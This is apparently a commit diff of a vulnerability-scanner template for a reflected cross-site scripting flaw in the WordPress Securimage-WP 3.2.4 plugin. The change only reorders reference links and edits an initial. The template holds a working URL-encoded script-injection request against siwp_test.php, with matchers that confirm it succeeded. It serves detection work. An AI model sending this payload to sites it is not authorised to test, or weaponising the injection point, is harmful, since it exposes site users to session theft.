vulnerabilities/wordpress/wp-securimage-xss.yaml (before)
id: wp-securimage-xss

info:
  name: WordPress Securimage-WP 3.2.4 - Cross-Site Scripting
  author: daffainfo
  severity: high
  description: WordPress Securimage-WP 3.2.4 plugin contains a cross-site scripting vulnerability via siwp_test.php. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  reference:
    - http://web.archive.org/web/20210123054214/https://www.securityfocus.com/bid/59816/info
    - https://www.exploit-db.com/exploits/38510
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  tags: wordpress,xss,wp-plugin

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/securimage-wp/siwp_test.php/%22/%3E%3Cscript%3Ealert(1);%3C/script%3E?tested=1'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<script>alert(1)</script>"
        part: body

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# Enhanced by md on 2022/09/23

vulnerabilities/wordpress/wp-securimage-xss.yaml (after)
id: wp-securimage-xss

info:
  name: WordPress Securimage-WP 3.2.4 - Cross-Site Scripting
  author: daffainfo
  severity: high
  description: WordPress Securimage-WP 3.2.4 plugin contains a cross-site scripting vulnerability via siwp_test.php. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  reference:
    - https://www.exploit-db.com/exploits/38510
    - http://web.archive.org/web/20210123054214/https://www.securityfocus.com/bid/59816/info
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  tags: wordpress,xss,wp-plugin

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/securimage-wp/siwp_test.php/%22/%3E%3Cscript%3Ealert(1);%3C/script%3E?tested=1'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<script>alert(1)</script>"
        part: body

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/09/23

vulnerabilities/wordpress/wp-securimage-xss.yaml (diff)
@@ -6,8 +6,8 @@ info:
   severity: high
   description: WordPress Securimage-WP 3.2.4 plugin contains a cross-site scripting vulnerability via siwp_test.php. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
   reference:
-    - http://web.archive.org/web/20210123054214/https://www.securityfocus.com/bid/59816/info
     - https://www.exploit-db.com/exploits/38510
+    - http://web.archive.org/web/20210123054214/https://www.securityfocus.com/bid/59816/info
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
     cvss-score: 7.2
@@ -35,4 +35,4 @@ requests:
         status:
           - 200
 
-# Enhanced by md on 2022/09/23
+# Enhanced by mp on 2022/09/23
